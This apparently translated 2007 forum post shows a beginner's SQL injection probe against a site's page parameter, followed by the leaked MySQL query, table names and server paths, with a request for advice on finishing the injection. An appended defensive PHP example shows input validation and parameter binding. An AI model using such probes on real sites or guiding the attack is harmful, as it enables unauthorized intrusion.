Dimi4
18.11.2007, 00:46
MySQL injection.
http://wtf.com/country/ukraine/4/?page=-2%20union/**/select/**/45,15/*
Heh, I guess I'm the only one who builds queries this stupidly :D
And it spits out something scary:
SELECT ai.id, ah.headline, at.full_text, am.smallimage_url as img, at.announce, lah.headline as en_name, lower(si.name), si.url, si.ahref as site_title, st.description FROM elgov_articleitem as ai, elgov_articletext as at, elgov_articleheadline as ah, elgov_subjectitem as si, elgov_subjecttitle as st JOIN elgov_articleactivity as aa LEFT JOIN elgov_articleimage as am ON (am.item_id = ai.id) LEFT JOIN elgov_articleheadline as lah ON (lah.item_id = ai.id AND lah.lang_id = 5) WHERE ai.id = ah.item_id AND ai.examine = 1 AND ai.id = at.item_id AND ah.lang_id = 7 AND at.lang_id = ah.lang_id AND ai.inode = si.id AND lower(si.name) = 'ukraine' AND st.item_id = si.id AND st.lang_id = ah.lang_id AND aa.article_id = ai.id AND aa.inode = 4 GROUP BY ai.id ORDER BY ah.headline LIMIT -45, 15
[ MYSQL ERROR ]: SELECT ai.id, ah.headline, at.full_text, am.smallimage_url as img, at.announce, lah.headline as en_name, lower(si.name), si.url, si.ahref as site_title, st.description FROM elgov_articleitem as ai, elgov_articletext as at, elgov_articleheadline as ah, elgov_subjectitem as si, elgov_subjecttitle as st JOIN elgov_articleactivity as aa LEFT JOIN elgov_articleimage as am ON (am.item_id = ai.id) LEFT JOIN elgov_articleheadline as lah ON (lah.item_id = ai.id AND lah.lang_id = 5) WHERE ai.id = ah.item_id AND ai.examine = 1 AND ai.id = at.item_id AND ah.lang_id = 7 AND at.lang_id = ah.lang_id AND ai.inode = si.id AND lower(si.name) = 'ukraine' AND st.item_id = si.id AND st.lang_id = ah.lang_id AND aa.article_id = ai.id AND aa.inode = 4 GROUP BY ai.id ORDER BY ah.headline LIMIT -45, 15 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-45, 15' at line 30 )
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/db_sql.class.php on line 62
Warning: Cannot modify header information - headers already sent by (output started at /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/db_sql.class.php:36) in /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/server.class.php on line 209
You'll immediately say "post the link!"
But give me a chance to do this injection myself, since I've only just started learning them. Yes, yes, I've read the manuals on Achat...
Waiting for your advice.
P.S. Please don't shout "LAMER! It's all simple here!" :eek:
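Why the request above ends in LIMIT -45, 15, and what the server-side fix looks like, as an added example that is not part of the original post or the site's code. It assumes the offset is computed as (page - 1) * 15, so only the number -2 from the parameter reaches MySQL, and the actual defect on display is the full query and file paths echoed to the client. The function names, the simplified query and the PDO connection are hypothetical.

```php
<?php
declare(strict_types=1);

ini_set('display_errors', '0');   // never render SQL or path details to the client
ini_set('log_errors', '1');

// Assumption: 15 rows per page, which matches "LIMIT -45, 15" for page=-2.
const PER_PAGE = 15;

/** Turn the raw ?page= value into [offset, count]; anything but 1..$maxPage becomes page 1. */
function pageToLimit(?string $raw, int $maxPage = 10000): array
{
    $page = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => $maxPage]]);
    if ($page === false) {
        $page = 1;                // "-2", "-2 union/**/select..." and null all land here
    }
    return [($page - 1) * PER_PAGE, PER_PAGE];
}

/** Hypothetical listing query; expects a PDO handle in PDO::ERRMODE_EXCEPTION mode. */
function fetchArticles(PDO $db, string $subject, ?string $rawPage): array
{
    [$offset, $count] = pageToLimit($rawPage);
    // Simplified stand-in for the query in the error output (same table names).
    $sql = 'SELECT ai.id, ah.headline
              FROM elgov_articleitem AS ai
              JOIN elgov_articleheadline AS ah ON ah.item_id = ai.id
              JOIN elgov_subjectitem AS si ON si.id = ai.inode
             WHERE LOWER(si.name) = :subject
             ORDER BY ah.headline
             LIMIT :offset, :count';
    try {
        $stmt = $db->prepare($sql);
        $stmt->bindValue(':subject', strtolower($subject), PDO::PARAM_STR);
        $stmt->bindValue(':offset', $offset, PDO::PARAM_INT);  // integers are bound,
        $stmt->bindValue(':count', $count, PDO::PARAM_INT);    // never concatenated
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        error_log('article list query failed: ' . $e->getMessage()); // server log only
        http_response_code(500);
        return [];
    }
}

// Constructed sample inputs, including the value from the URL above.
foreach (['3', '-2', '-2 union/**/select/**/45,15/*', null] as $raw) {
    echo var_export($raw, true), ' => ', json_encode(pageToLimit($raw)), PHP_EOL;
}
```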